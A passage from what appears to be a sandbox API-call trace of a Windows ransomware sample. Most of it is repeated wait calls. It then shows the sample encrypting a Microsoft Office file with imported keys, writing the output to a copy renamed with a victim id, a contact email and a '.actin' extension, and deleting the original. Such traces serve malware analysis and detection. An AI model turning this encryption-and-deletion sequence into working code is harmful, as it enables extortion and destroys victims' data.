dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.107] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.108] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.109] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.111] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.112] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.113] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.114] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.115] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.116] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.117] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.118] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.119] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.120] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.121] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.122] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.123] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.124] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0047.403] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x352fb68 | out: pbBuffer=0x352fb68) returned 1 [0047.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0047.406] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x352fb00 | out: lpFileSize=0x352fb00*=2088960) returned 1 [0047.406] CloseHandle (hObject=0x340) returned 1 [0047.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde")) returned 0x220 [0047.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0047.406] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x352faa0 | out: lpNewFilePointer=0x0) returned 1 [0047.407] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x352faa0 | out: lpNewFilePointer=0x0) returned 1 [0047.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0047.407] CryptImportKey (in: hProv=0xf466e8, pbData=0x352fa58, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x352fab4 | out: phKey=0x352fab4*=0xf71d80) returned 1 [0047.407] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x352fb68, dwFlags=0x0) returned 1 [0047.407] ReadFile (in: hFile=0x340, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0047.440] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0047.606] WriteFile (in: hFile=0x344, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0047.626] ReadFile (in: hFile=0x340, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0xedf00, lpOverlapped=0x0) returned 1 [0047.629] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0xedf10, dwBufLen=0xedf10 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0xedf10) returned 1 [0047.630] WriteFile (in: hFile=0x344, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0xedf10, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0xedf10, lpOverlapped=0x0) returned 1 [0047.839] CryptImportKey (in: hProv=0xf466e8, pbData=0x352fa4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x352fab8 | out: phKey=0x352fab8*=0xf71bc0) returned 1 [0047.839] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x352fb68, dwFlags=0x0) returned 1 [0047.839] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x40, dwBufLen=0x40 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x40) returned 1 [0047.839] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0047.839] WriteFile (in: hFile=0x344, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0xf2, lpOverlapped=0x0) returned 1 [0047.839] CryptDestroyKey (hKey=0xf71d80) returned 1 [0047.839] CloseHandle (hObject=0x340) returned 1 [0047.839] CloseHandle (hObject=0x344) returned 1 [0048.059] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde")) returned 1 [0048.092] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x352fb68 | out: pbBuffer=0x352fb68) returned 1 [0048.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft 